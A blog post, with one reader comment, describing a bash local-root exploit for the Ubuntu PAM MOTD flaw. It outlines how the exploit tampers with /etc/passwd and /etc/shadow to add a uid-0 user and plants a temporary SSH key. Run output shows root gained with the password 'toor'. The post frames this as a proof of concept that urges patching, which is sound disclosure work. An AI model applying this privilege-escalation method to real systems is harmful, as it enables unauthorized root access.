The exploit made by Kristian Erik Hermansen allows tampering any file. From that, we can get root for example by adding a user with uid 0. We don't want an empty password because the SSH server sshd has default PermitEmptyPasswords to no. Also, we don't want to prompt the user for his password at SSH connection, so we could create a temporary SSH key and add it to authorized_keys. Also, we want to be sure we backup any file we modify. Finally, we want to remove the rogue user and restore files we modified.
With some shell scripting you can get the following exploit in simple bash:
user@ubuntu:~$ bash ubuntu-pam-motd-local-root.sh [*] Ubuntu PAM MOTD local root [*] Backuped /home/user/.ssh/authorized_keys [*] SSH key set up [*] Backuped /home/user/.cache [*] spawn ssh [+] owned: /etc/passwd [*] spawn ssh [+] owned: /etc/shadow [*] Restored /home/user/.cache [*] Restored /home/user/.ssh/authorized_keys [*] SSH key removed [+] Success! Use password toor to get root Password: root@ubuntu:/home/user# id uid=0(root) gid=0(root) groups=0(root)
If you're not under Ubuntu 9.10/10.04 or up-to-date, it should fail like this:
user@ubuntu:~$ bash ubuntu-pam-motd-local-root.sh [*] Ubuntu PAM MOTD local root [*] Backuped /home/user/.ssh/authorized_keys [*] SSH key set up [*] Backuped /home/user/.cache [*] spawn ssh [-] Own /etc/passwd failed [*] Restored /home/user/.cache [*] Restored /home/user/.ssh/authorized_keys [*] SSH key removed user@ubuntu:~$
It can be used as a proof of concept to repeat how important security updates are. Don't ignore them!
Hah...I considered adding the SSH automation as well to my very simplified published exploit version, but I chose not to because I felt messing around with someone's SSH keys is generally frowned upon ;) Glad to see someone posting that example though for others to try out. Cheers...
ReplyDelete